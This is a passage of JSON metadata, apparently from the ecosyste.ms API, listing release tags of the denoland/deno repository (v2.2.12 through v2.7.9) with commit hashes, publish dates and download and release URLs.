:null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.